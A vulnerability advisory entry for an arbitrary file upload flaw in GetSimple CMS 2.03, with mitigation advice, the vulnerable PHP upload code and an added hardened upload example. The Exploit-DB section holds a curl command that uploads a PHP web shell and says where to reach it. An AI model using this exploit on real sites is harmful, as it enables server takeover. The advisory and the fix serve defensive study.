Vendor: GetSimple CMS
By: Unknown
CVSS: 7.5 (HIGH)
CWE: 434 (Arbitrary File Upload)
Product Name: GetSimple CMS
Affected Version From: 02.03
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:getsimple_cms:getsimple_cms:2.03
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Arbitrary File Upload in GetSimple CMS

The GetSimple CMS is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of GetSimple CMS and implement proper input validation and sanitization.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46427/info

GetSimple CMS is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

GetSimple CMS 2.03 is vulnerable; other versions may also be affected. 

Bug Code:
getsimple/admin/upload-ajax.php

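if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
    if (!empty($_FILES))
    {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        // Client-supplied file name; its extension is kept as sent
        $name = clean_img_name($_FILES['Filedata']['name']);
        $targetPath = GSDATAUPLOADPATH;
        $targetFile = str_replace('//','/',$targetPath) . $name;
        // Stored in the uploads directory with no file-type check in this excerpt
        move_uploaded_file($tempFile, $targetFile);
    }
}
// (excerpt ends here)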
----------------------------------------------------------------------

Generating SESSIONHASH: md5( $salt. $sitename)
[XPL]

curl -F "Filedata=@yourshell.txt;filename=shell.php" http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO

After, enjoy your Bacon-Shell here ... http://getsimple_localhost/data/uploads/shell.php
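
A hardened counterpart to the upload-ajax.php excerpt above, as an added example that is not GetSimple's own code or a vendor patch: it rejects the upload unless a per-session token matches, the extension is on an allowlist and the sniffed content type agrees, then stores the file under a server-generated name. The function store_upload(), the ALLOWED_TYPES list and the token arguments are hypothetical; GSDATAUPLOADPATH is taken from the excerpt, and PHP's fileinfo extension is assumed to be enabled.

```php
<?php
// Added example (not project code). store_upload(), ALLOWED_TYPES and the
// token arguments are hypothetical names chosen for illustration.

const ALLOWED_TYPES = [            // extension => MIME type sniffed from content
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
    'pdf' => 'application/pdf',
];

/**
 * Validate one $_FILES entry and move it into $destDir under a server-chosen name.
 * Returns the stored file name, or null when the upload is rejected.
 */
function store_upload(array $file, string $destDir, string $sessionToken, string $sentToken): ?string
{
    // Random per-session token compared in constant time, instead of a value
    // derived only from site-wide inputs such as md5($salt . $sitename).
    if ($sessionToken === '' || !hash_equals($sessionToken, $sentToken)) {
        return null;
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // The client-supplied name is used only to read the claimed extension.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return null;               // a name such as shell.php is rejected here
    }
    // The file content must match what the extension claims.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return null;
    }
    // Server-generated name: no client-controlled characters reach the path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($destDir, '/') . '/' . $name;
    return move_uploaded_file($file['tmp_name'], $target) ? $name : null;
}

// Usage inside the upload endpoint (session already started; token name assumed):
// $stored = store_upload($_FILES['Filedata'] ?? [], GSDATAUPLOADPATH,
//                        $_SESSION['upload_token'] ?? '', $_POST['token'] ?? '');
```

Serving the uploads directory with script execution disabled adds a second barrier if a file of an unexpected type is ever stored there.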